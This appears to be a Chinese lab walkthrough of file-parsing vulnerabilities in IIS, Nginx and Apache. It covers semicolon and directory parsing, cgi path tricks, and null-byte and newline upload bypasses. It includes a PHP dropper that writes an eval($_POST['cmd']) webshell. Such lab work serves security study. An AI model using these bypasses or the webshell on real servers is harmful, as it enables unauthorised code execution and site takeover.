文件解析漏洞靶场通关合集

embedded/2025/3/14 23:46:02/

一、IIS解析漏洞

(一)iis6的目录解析漏洞(.asp目录中的所有文件都会被当做asp文件执行)
第一步:在网站根目录下创建了一个x.asp文件夹,并在文件夹中创建一个名为1.txt的文本文档

第二步:文本文档中输入<% =now()%>

第三步:访问1.txt, 返回了的当前日期和时间值

(二)iis6的分号截断解析漏洞(1.asp;.jpg 分号起到截断的效果)
第一步:在网站根目录新建文件1.asp;.txt

第二步:访问1.asp;.txt, 返回了的当前日期和时间值

服务器看成是1.asp

(三)iis6的畸形后缀解析(.asa/.cer/.cdx的文件都会被当做asp文件执行)
第一步:在网站根目录新建文件1.asa

第二步:访问1.asa, 返回了的当前日期和时间值

(四)iis7的phpcgi解析漏洞(在文件末尾 加上 /.php,文件就会被当做php文件)
第一步:物理机安装IIS后,安装PHPstudy for IIS
第二步:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1前的分号删去

第三步:IIS --- 配置⽹站 --- 处理程序映射 --- PHPStudy_FastCGI --- 请求限制 --- 取消勾选
第四步:在网站根目录新建文件phpinfo.jpg

第五步:访问phpinfo.jpg/.php,发现phpinfo.jpg被当作php文件运行

二、Nginx解析漏洞

(一)nginx的phpcgi解析漏洞(同上)
第一步:加工docker-compose.yml,添加版本号,更改映射端口为82

第二步:docker-compose up -d 创建并启动容器

第三步:访问http://47.103.81.25:82/,成功访问,上传文件成功

#上传保存位置
/var/www/html/uploadfiles/0412c29576c708cf0155e8de242169b1.jpg
第四步:访问test.jpg/.php,发现test.jpg被当作php文件运行

#URL
http://47.103.81.25:82/uploadfiles/0412c29576c708cf0155e8de242169b1.jpg/.php
(二)nginx的00截断解析漏洞(上传的时候两个空格,第二个空格20改成00可以起到截断的作用)
第一步:加工docker-compose.yml,添加版本号,更改映射端口为8080

第二步:docker-compose up -d 创建并启动容器
第三步:访问http://47.103.81.25:8080/,直接选择php文件上传,显示 Unsupported filetype uploaded.

第四步:重新选择phpinfo.jpg,打开bp进行抓包,并加2个空格.php,点击HEX,将第2个空格位置改为00,放行,显示文件成功上传

上传的文件名为phpinfo.jpg0x200x00.php

第五步:访问phpinfo.jpg,404

第六步:由于404抓不到包,删去g,回车抓包;修改文件名为phpinfo.jpg空格空格.php

第七步:修改HEX也为0x200x00,即访问的文件名也为phpinfo.jpg0x200x00.php,放行,访问成功

00起到截断作用,服务器认为是允许的jpg文件,但中间件认为00是文件名的一部分

三、Apache解析漏洞

(一)apache的从右往左解析漏洞(apache的解析规则是从右往左,右边的不认识会往左递归)

靶场暂缺

(二)apache的多后缀解析漏洞(apache会为不同的后缀执行不同的指令)
第一步:加工docker-compose.yml,添加版本号,更改映射端口为81

第二步:docker-compose up -d 创建并启动容器

第三步:访问http://47.103.81.25:81/,成功访问,上传文件成功

第四步:访问上传的father.php.jpg,使其生成木马

#father.php.jpg文件内容
GIF89a
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
第五步:访问生成的webshell.php,成功getshell

(三)apache的0a换行解析漏洞(在文件未尾加上空格,空格的20改成0a,访问文件的时候加上%0a)
第一步:修改配置文案,端口为8081,启动docker

第二步:访问并上传文件,bp抓包,在evil后面加一个空格

第三步:点击HEX,找到添加的空格位置,改为0a(%00 --> %0a),放行

第四步:访问phpinfo(),成功访问

                                                                                                                        FROM  IYU_ 


http://www.ppmy.cn/embedded/172610.html

相关文章

零成本搭建Calibre个人数字图书馆支持EPUB MOBI格式远程直读

文章目录 前言1.网络书库软件下载安装2.网络书库服务器设置3.内网穿透工具设置4.公网使用kindle访问内网私人书库 前言 嘿&#xff0c;各位书虫们&#xff01;今天要给大家安利一个超级炫酷的技能——如何在本地Windows电脑上搭建自己的私人云端书库。亚马逊服务停了&#xff…

华为OD机试 - 平均像素值-贪心算法(Java 2024 E卷 100分)

题目描述 一个图像有 ( n ) 个像素点,存储在一个长度为 ( n ) 的数组 img 里,每个像素点的取值范围是 ([0,255]) 的正整数。请你给图像每个像素点值加上一个整数 ( k )(可以是负数),得到新图 newImg,使得新图 newImg 的所有像素平均值最接近中位值 ( 128 )。请输出这个整…

【Java基础】Java 的内部类

前言 在 Java 编程的浩瀚宇宙中&#xff0c;内部类宛如一颗独具魅力的星辰&#xff0c;为代码的组织与设计开辟了新的天地。内部类&#xff0c;从字面意义理解&#xff0c;就是定义在另一个类内部的类。这种看似简单的嵌套结构&#xff0c;却蕴含着强大的能量&#xff0c;不仅…

基于Redis实现限流

限流尽可能在满足需求的情况下越简单越好&#xff01; 分布式限流是指在分布式系统中对请求进行限制&#xff0c;以防止系统过载或滥用资源。以下是常见的分布式限流策略及其实现方式&#xff1a; 1、基于 Redis 的固定窗口限流 原理&#xff1a; 设定一个时间窗口&#xff0…

Python 正则表达式模块 re

Python 正则表达式模块 re flyfish 一、正则表达式基础 1. 什么是正则表达式&#xff1f; 正则表达式&#xff08;Regular Expression, RE&#xff09;是一种用于匹配、查找和替换文本模式的工具&#xff0c;由普通字符&#xff08;如字母、数字&#xff09;和特殊字符&…

HTTP 各版本协议简介

HTTP HTTP 本质上是客户端-服务器计算模型中的请求/响应协议&#xff0c;是万维网的主要通信方式。最初的版本由 &#xff08;Tim Berners-Lee&#xff09;在 1989 年作为应用程序协议提出&#xff0c;非常有限&#xff0c;并迅速修改以支持更广泛的浏览器和服务器功能。 尽管…

贪心算法五

> 作者&#xff1a;დ旧言~ > 座右铭&#xff1a;松树千年终是朽&#xff0c;槿花一日自为荣。 > 目标&#xff1a;了解什么是贪心算法&#xff0c;并且掌握贪心算法。 > 毒鸡汤&#xff1a;有些事情&#xff0c;总是不明白&#xff0c;所以我不会坚持。早安! >…

【TMS570LC4357】之工程创建

备注&#xff1a;具体资料请在官网海淘.TMS570LC4357资料 在线文档Hercules Safety MCU Resource Guide — Hercules Safety MCUs Documentation XDS100 Debug Probe (ti.com) Git https://git.ti.com/git/hercules_examples/hercules_examples.git https://git.ti.com/cgit/h…